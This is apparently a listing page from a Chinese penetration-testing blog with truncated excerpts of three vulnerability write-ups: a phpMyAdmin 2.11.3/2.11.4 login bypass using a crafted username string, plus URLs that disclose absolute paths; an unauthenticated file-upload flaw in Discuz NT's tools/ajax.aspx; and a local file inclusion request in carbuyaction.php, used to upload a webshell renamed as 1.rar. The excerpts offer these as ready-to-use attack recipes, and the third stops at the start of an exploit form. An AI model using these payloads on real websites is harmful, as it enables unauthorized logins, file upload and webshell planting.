渗透测试

分享一批漏洞

发表于4年前 | 作者: seay

0
1.phpmyadmin万能密码漏洞 影响版本:2.11.3 / 2.11.4 利用方法:用户名处写入'localhost'@'@"则登录成功。 (注意全部是英文标点符号,最后一个为英文双引号) 附上几个php爆绝对路径的办法: http://xxx/phpMyAdmin/libraries/select_lang.lib.php http://xxx/phpMyAdmin/darkblue_orange/layout.inc.php http://xxx/phpMyAdmin/index.php?lang[]=1 http://xxx/phpmyadmin/themes/darkblue_orange/layou......

实用工具

Discuz NT 多版本文件上传漏洞

发表于5年前 | 作者: seay

0
文章作者:rebeyond  信息来源:邪恶八进制信息安全团队(www.eviloctal.com)  注:文章首发I.S.T.O信息安全团队,后由原创作者友情提交到邪恶八进制信息安全团队技术讨论组。I.S.T.O版权所有,转载需注明作者。  受影响版本:貌似都受影响。  漏洞文件:tools/ajax.aspx  漏洞分析:这个页面里的ajax请求,都没有进行权限的验证,游客权限就可以调用其中的所有方法,很危险的写法,于是有了下面的漏洞。  ......

实用工具

1
上传漏洞1: 漏洞原理: /plus/carbuyaction.php?dopost=memclickout&amp;oid =S-P0RN8888&amp;rs[code]=../dialog/select_soft_post 这样就包含了dialog/select_soft_post 要求网站开启新会员注册功能,首先注册新会员,登陆会员中心,选择记住密码或者记住登录,不要关闭浏览器最好拉,因为下面的exp要保持在登录状态下。把马儿提前重命名为1.rar。 <form action=”http://www.3hack.......